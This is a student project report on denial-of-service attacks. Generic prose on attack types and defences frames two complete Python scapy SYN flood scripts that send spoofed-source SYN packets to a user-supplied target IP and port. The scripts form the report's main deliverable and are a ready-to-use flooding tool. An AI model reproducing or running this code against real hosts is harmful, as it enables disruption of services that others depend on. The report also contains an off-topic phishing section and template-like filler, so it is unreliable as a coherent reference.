AMRITSAR GROUP OF COLLEGES

Autonomous Status Conferred by UGC, NACC-A Grade

PROJECT REPORT
On

“Dos Attack”

Submitted Partial fulfillment of the requirement for the award of degree of

Bachelor of Technology
In
COMPUTER SCIENCE & ENGINEERING
Batch
(2020-2024)

Submitted To: Submitted By:

Head of Department Simarpreet Singh(2000207)

(CSE) Souvik Biswas(2000212)

Tanya Sharma(2000219)

Vanshita(2000228)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

Amritsar Group of Colleges, Amritsar
 ABSTRACT

A Denial-of-Service (DoS) attack is a type of cyber attack that targets computer systems or
networks with the goal of overwhelming them with traffic or other forms of communication until
they become unusable. The purpose of a DoS attack is to disrupt the availability of the targeted
system, rendering it inaccessible to users or customers. There are several types of DoS attacks,
including volumetric attacks, which flood the targeted system with large amounts of traffic;
protocol attacks, which exploit weaknesses in network protocols to cause disruptions; and
application layer attacks, which target specific applications or services running on a system.
Defending against DoS attacks typically involves a combination of network infrastructure and
software-based solutions, as well as proactive monitoring and incident response planning.

i
 ACKNOWLEDGEMENT

This is a humble effort to express our sincere gratitude towards those who have guided and
helped us to complete this project. A project is major milestone during the study period of a
student. As such this project was a challenge to us and was an opportunity to prove our caliber.
We are highly grateful and obliged to each and every one making us help out of problems being
faced by team. It would not have been possible to see through the undertaken project without
the guidance of Er. Jagminder Kaur. It was purely on the basis of their experience and
knowledge that we are able to clear all the theoretical and technical hurdles during the
development phases of this project work. Last but not the least we are very thankful to the Dr.
Sandeep Kad, Head of Department and all Faculty Members of Computer Science
Department who gave us an opportunity to face real time problems while fulfilling need of an
organization by making projects for them.

ii
 DECLARATION

We here by declare that the project work entitled “Dos Attack” has been completely prepared
by my team as a part of our core subject during this semester. This report is the outcome of our
efforts and has been submitter in the department of computer science and engineering. The
contents of this report are fully verified as per our knowledge.

Simarpreet Singh
University Rollno:2000207

Souvik Biswas
University rollno:2000212

Tanya Sharma
University Rollno:2000219

Vanshita
University Rollno:2000228

iii
 INDEX

SR.NO CONTENT PAGE NO.

1. Abstract i
2. Acknowledgement ii
3. Declaration iii
4. List Of Figures v
5. Introduction to Project 1
6. Objective of Project 2
7. Project Scope 3
8. Features 4
9. Project Category 5-6
10. Structure of Program 7
11. Module Description 8
12. Code 9-12
13. Snapshots 13
14. Conclusion 14
15. References 15

iv
 List of Figures

Figure no Figure Title Page No

1 Editor Output 13
2 WireShark analysation 13

v
 INTRODUCTION OF PROJECT

DOS Attacks or Denial Of Services Attack have become very common amongst Hackers who
use them as a path to fame and respect in the underground groups of the Internet. Denial of Service
Attacks basically means denying valid Internet and Network users from using the services of the
target network or server. It basically means, launching an attack, which will temporarily make
the services, offered by the Network unusable by legitimate users.

In others words one can describe a DOS attack, saying that a DOS attack is one in which you clog
up so much memory on the target system that it cannot serve legitimate users. Or you send the
target system data packets, which cannot be handled by it and thus causes it to either crash, reboot
or more commonly deny services to legitimate users.

DOS Attacks are of the following different types-:

• Those that exploit vulnerabilities in the TCP/IP protocols suite.
• Those that exploit vulnerabilities in the Ipv4 implementation.
• There are also some brute force attacks, which try to use up all resources of the target
system and make the services unusable.

1
 OBJECTIVE OF PROJECT

The objective of DoS attacks in cybersecurity could be to provide a comprehensive overview of

the topic, including the following:

1. A clear definition of DoS attacks and how they work, including the difference between a
DoS and a DDoS attack.
2. The impact of DoS attacks on businesses, including the financial costs, reputational
damage, and legal implications.
3. The different types of DoS attacks and their methods of execution, including network-
based attacks, application layer attacks, and protocol attacks.
4. Techniques and tools used by attackers to launch DoS attacks, including botnets,
amplification attacks, and reflection attacks.
5. Best practices for preventing and mitigating the risk of DoS attacks, including
implementing network security measures, monitoring traffic patterns, and implementing
contingency plans for responding to an attack.
6. Case studies of high-profile DoS attacks and their impact on businesses, along with an
analysis of the attackers' methods and motivations.

2
 PROJECT SCOPE

The scope of a project on DoS attacks in cybersecurity would typically include the following:

1. Definition of the project goals and objectives, along with a clear understanding of the
target audience for the report.
2. Research on the different types of DoS attacks and their impact on businesses, including
case studies and examples of recent attacks.
3. Analysis of the methods and tools used by attackers to launch DoS attacks, including
techniques for identifying and mitigating these attacks.
4. Identification of best practices for preventing and mitigating the risk of DoS attacks,
including network security measures, monitoring traffic patterns, and implementing
contingency plans for responding to an attack.
5. Assessment of current industry standards and best practices related to DoS attack
prevention and mitigation.
6. Development of a comprehensive report that presents findings, analysis, and
recommendations related to DoS attacks in cybersecurity.
7. Presentation of the report to stakeholders and decision-makers, along with
recommendations for next steps and ongoing monitoring and maintenance of the
organization's cybersecurity defenses.

3
 FEATURES

Some features of DoS attacks:

• Flood of traffic: DoS attacks flood the targeted system with a high volume of traffic or
requests, which causes the system to become unavailable to legitimate users.
• Exhausting resources: DoS attacks can exhaust the resources of the targeted system, such
as CPU cycles, memory, and network bandwidth.
• Multiple sources: Distributed Denial of Service (DDoS) attacks involve multiple sources,
such as botnets, amplifiers, and reflectors, that coordinate to attack a single target.
• Spoofing techniques: Attackers may use techniques like IP spoofing to disguise the origin
of the attack and make it more difficult to trace.
• Attack amplification: Attackers may use techniques like amplification attacks to increase
the volume of traffic directed at the target system, making it more difficult to defend
against.
• Layered attacks: Some DoS attacks target specific layers of the network stack, such as
the application layer, the transport layer, or the network layer.
• Impact on business: DoS attacks can have a significant impact on businesses, including
lost revenue, damage to reputation, and potential legal liabilities.
• Prevention and mitigation: There are several ways to prevent and mitigate the impact of
DoS attacks, including implementing network security measures, monitoring traffic
patterns, and implementing contingency plans for responding to an attack.

4
 PROJECT CATEGORY

The project category for DoS attacks in cybersecurity would fall under the Information
Technology (IT) category. This would be focused on the technical aspects of DoS attacks,
including the techniques and tools used by attackers, as well as the prevention and mitigation
measures used to protect against these attacks. The IT category encompasses a wide range of
projects related to the development, deployment, and maintenance of computer systems and
software, including network security, software development, and cybersecurity.

• Importance of the IT category: The IT category is an essential part of modern businesses

and organizations. It includes everything from hardware and software to network
infrastructure and cybersecurity. The IT category plays a critical role in enabling
businesses to operate efficiently, communicate effectively, and stay competitive in the
digital age.
• Key areas of focus: Within the IT category, there are several key areas of focus, including
network security, data management, software development, and IT infrastructure. DoS
attacks falls within the network security domain, which is responsible for safeguarding
the integrity and availability of network resources and data.
• Career opportunities: The IT category offers a wide range of career opportunities for
professionals with diverse skill sets and backgrounds. IT professionals may work in roles
such as network administrators, cybersecurity specialists, software developers, data
analysts, or IT managers.
• Emerging technologies: The IT category is constantly evolving as new technologies
emerge and existing technologies are improved. Some of the emerging technologies
within the IT category include artificial intelligence, blockchain, and the Internet of
Things (IoT). These technologies offer exciting new possibilities for businesses and
organizations but also present new security challenges that must be addressed.
• Challenges and opportunities: The IT category presents both challenges and
opportunities for businesses and organizations. On one hand, advances in technology have
enabled businesses to operate more efficiently and effectively than ever before. the
complexity and interconnectedness of modern IT systems also make them vulnerable to a
wide range of threats, including DoS attacks. Effective management of IT resources and
security measures is essential to address these challenges and take advantage of the
opportunities presented by the IT category.
5
 Application of DoS Attack

1. Types of organizations targeted: DoS attacks can target a wide range of organizations,
including financial institutions, government agencies, e-commerce websites, and online gaming
platforms. Provide examples of recent attacks on these types of organizations and the impact
they had.

2. Motivations of attackers: There are several reasons why attackers may launch DoS attacks,
including financial gain, political motives, and personal grudges. Provide examples of attacks
motivated by these factors and how they were executed.

3. Techniques used: Attackers use a variety of techniques to launch DoS attacks, including botnets,
amplification attacks, and application-layer attacks. Describe these techniques and how they
work, including real-world examples of each.

4. Impact on targeted organizations: DoS attacks can have a significant impact on targeted
organizations, including lost revenue, damage to reputation, and legal liabilities. Describe the
potential impact of a successful DoS attack and provide examples of organizations that have
suffered such an attack.

5. Prevention and mitigation: There are several ways to prevent and mitigate the impact of DoS
attacks, including implementing network security measures, monitoring traffic patterns, and
implementing contingency plans for responding to an attack. Describe these measures and how
they can be effective in mitigating the risk of a DoS attack.

6. Legal and ethical considerations: DoS attacks are illegal and unethical, and individuals or
organizations caught launching such attacks may face severe legal consequences. Discuss the
legal and ethical considerations of DoS attacks and the consequences that attackers may face if
caught.

6
 STRUCTURE OF PROGRAM

Tools:- VS code

Visual Studio Code is a distribution of the Code - OSS repository with Microsoft-specific
customizations released under a traditional Microsoft product license.Visual Studio Code
combines the simplicity of a code editor with what developers need for their core edit-build-
debug cycle. It provides comprehensive code editing, navigation, and understanding support
along with lightweight debugging, a rich extensibility model, and lightweight integration with
existing tools.

Visual Studio Code is updated monthly with new features and bug fixes. You can download it
for Windows, macOS, and Linux on Visual Studio Code's website. To get the latest releases
every day, install the Insiders build.

Programming Language :- python

Python is dynamically-typed and garbagecollected programming language. It was created by

Guido van Rossum during 1985- 1990. Like Perl, Python source code is also available under the
GNU General Public License (GPL).

Software Requirements:-

Operating system: Windows

Python Runtime Environment.
Hardware Requirements:-

Processor: 800MHz Intel Pentium III or equivalent

Memory: 512 MB
Disk space: 1GB of free Disk free Space.

7
 MODULE DESCRIPTION

Phishing attacks can take many forms, and their ultimate goal is to obtain sensitive information
such as usernames, passwords, credit card details, or personal data from unsuspecting individuals.
Here are some common types of phishing attacks:

1. Deceptive emails:

Attackers send emails that appear to be from a legitimate source, such as a bank or an
online retailer, asking the recipient to click on a link and enter their login credentials or
credit card information.

2. Spear phishing:

A targeted attack that is personalized to the recipient and appears to be from a trusted
source, such as a colleague or a business partner. These attacks often include a sense of
urgency or authority, encouraging the recipient to act quickly.

3. Smishing:

Similar to phishing, but the attack is delivered through a text message rather than email.
The attacker might send a text message that appears to be from a legitimate source, asking
the recipient to call a phone number or click on a link to enter their personal information.

4. Pharming:

Attackers redirect users to a fake website that appears to be legitimate, such as a bank or
an e-commerce site, where they enter their personal information.

5. Malware attacks:
Phishing emails may contain attachments or links that install malware on the user' allowing
Attacker to access information

8
 CODE

py3_SYN-Flood.py

from os import system

from sys import stdout
from scapy.all import *
from random import randint

def randomIP():
ip = ".".join(map(str, (randint(0,255)for _ in range(4))))
return ip

def randInt():
x = randint(1000,9000)
return x

def SYN_Flood(dstIP,dstPort,counter):
total = 0
print ("Packets are sending ...")

for x in range (0,counter):

s_port = randInt()
s_eq = randInt()
w_indow = randInt()

IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP

TCP_Packet = TCP ()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow

send(IP_Packet/TCP_Packet, verbose=0)
total+=1
9
 stdout.write("\nTotal packets sent: %i\n" % total)

def info():
system("clear")
print ("#####################################")

print ("# Welcome to Python3 SYN Flood Tool #")

print ("#####################################")

dstIP = input ("\nTarget IP : ")

dstPort = input ("Target Port : ")

return dstIP,int(dstPort)

def main():
dstIP,dstPort = info()
counter = input ("How many packets do you want to send : ")
SYN_Flood(dstIP,dstPort,int(counter))

10
py3_synflood_cmd.py

from sys import stdout

from scapy.all import *
from random import randint
from argparse import ArgumentParser

def randomIP():
ip = ".".join(map(str, (randint(0, 255)for _ in range(4))))
return ip

def randInt():
x = randint(1000, 9000)
return x

def SYN_Flood(dstIP, dstPort, counter):

total = 0
print ("Packets are sending ...")

for x in range (0, counter):

s_port = randInt()
s_eq = randInt()
w_indow = randInt()

IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP

TCP_Packet = TCP ()
TCP_Packet.sport = s_port
TCP_Packet.dport = int(dstPort)
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow

send(IP_Packet/TCP_Packet, verbose=0)
total+=1

11
 stdout.write("\nTotal packets sent: %i\n" % total)
def main():
parser = ArgumentParser()
parser.add_argument('--target', '-t', help='target IP address')
parser.add_argument('--port', '-p', help='target port number')
parser.add_argument('--count', '-c', help='number of packets')
parser.add_argument('--version', '-v', action='version', version='Python SynFlood Tool
v2.0.1\n@EmreOvunc')
parser.epilog = "Usage: python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 1"

args = parser.parse_args()

if args.target is not None:

if args.port is not None:
if args.count is None:
print('[!]You did not use --counter/-c parameter, so 1 packet will be sent..')
SYN_Flood(args.target, args.port, 1)

else:
SYN_Flood(args.target, args.port, int(args.count))

else:
print('[-]Please, use --port/-p to give target\'s port!')
print('[!]Example: -p 445')
print('[?] -h for help')
exit()
else:
print('''usage: py3_synflood_cmd.py [-h] [--target TARGET] [--port PORT]
[--count COUNT] [--version]
optional arguments:
-h, --help show this help message and exit
--target TARGET, -t TARGET
target IP address
--port PORT, -p PORT target port number
--count COUNT, -c COUNT
number of packets
--version, -v show program's version number and exit''')
sys.exit()

main()

12
 Snapshot

Fig 1 : editor output

Fig 2:WireShark Analysation

13
 CONCLUSION

Dos attack tools are readily available and any internet host is targetable as either a zombie or the
ultimate Dos focus. These attacks can be costly and frustrating and are difficult, if not impossible
to eradicate. The best defence is to hinder attackers through vigilant system administration.
Applying patches, updating anti-malicious software programs, system monitoring, and reporting
incidents go further than retarding DDos attacks – these defences also protect against other
attacks.

The Internet is not stable—it reforms itself rapidly. This means that DDoS countermeasures
quickly become obsolete. New services are offered through the Internet, and new attacks are
deployed to prevent clients from accessing these services. However, the basic issue is whether
DDoS attacks represent a network problem or an individual problem—or both. If attacks are
mainly a network problem, a solution could derive from alterations in Internet protocols.
Specifically, routers could filter malicious traffic, attackers could not spoof IP addresses, and
there would be no drawback in routing protocols. If attacks are mostly the result of individual
system weaknesses, the solution could derive from an effective IDS system, from an antivirus, or
from an invulnerable firewall. Attackers then could not compromise systems in order to create a
"zombies" army. Obviously, it appears that both network and individual hosts constitute the
problem. Consequently, countermeasures should be taken from both sides. Because attackers
cooperate in order to build the perfect attack methods, legitimate users and security developers
should also cooperate against the threat. The solution will arise from combining both network
and individual countermeasures.

14
 REFERENCES

• https://www.geeksforgeeks.org/deniel-service-prevention/

• https://www.paloaltonetworks.com/cyberpedia/what-is-a-denial-of-service-attack-dos

• http://www.usenix.org/events/lisa2000/full_papers/dietrich/dietric

• http://www.panix.com/press/synattack.html

• http://www.usenix.org/events/lisa2000/full_papers/dietrich/dietrich_html/

15